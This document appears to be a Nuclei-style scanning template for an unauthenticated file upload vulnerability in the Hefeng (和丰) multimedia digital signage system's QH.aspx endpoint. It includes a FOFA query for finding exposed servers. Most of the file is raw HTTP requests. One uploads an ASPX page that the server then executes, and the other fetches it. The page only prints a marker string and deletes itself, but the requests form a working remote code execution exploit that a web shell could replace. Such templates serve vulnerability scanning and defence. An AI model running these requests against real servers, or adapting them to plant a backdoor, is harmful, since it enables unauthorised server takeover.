http:
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /QH.aspx HTTP/1.1
          Host: {{Hostname}}
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr

          ------WebKitFormBoundaryhbcZX7o0Hw19h3kr
          Content-Disposition: form-data; name="fileToUpload"; filename="test666.aspx"
          Content-Type: application/octet-stream

          <%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
          ------WebKitFormBoundaryhbcZX7o0Hw19h3kr
          Content-Disposition: form-data; name="action"

          upload
          ------WebKitFormBoundaryhbcZX7o0Hw19h3kr
          Content-Disposition: form-data; name="responderId"

          ResourceNewResponder
          ------WebKitFormBoundaryhbcZX7o0Hw19h3kr
          Content-Disposition: form-data; name="remotePath"

          /opt/resources
          ------WebKitFormBoundaryhbcZX7o0Hw19h3kr--
        - |
          GET /opt/resources/test666.aspx HTTP/1.1
          Host: {{Hostname}}
id: hefeng-QH_aspx-File-upload
info:
    author: Superhero
    description: |-
        fofa: app="和丰山海-数字标牌"
        和丰多媒体信息发布系统 QH.aspx 接口存在文件上传漏洞，未经身份验证的远程攻击者可利用此漏洞上传任意后门文件，执行恶意指令，从而获取服务器权限。
    name: 和丰多媒体信息发布系统 QH.aspx 文件上传
    reference:
        - https://blog.csdn.net/m0_60571842/article/details/140111076
    severity: high
    tags: []
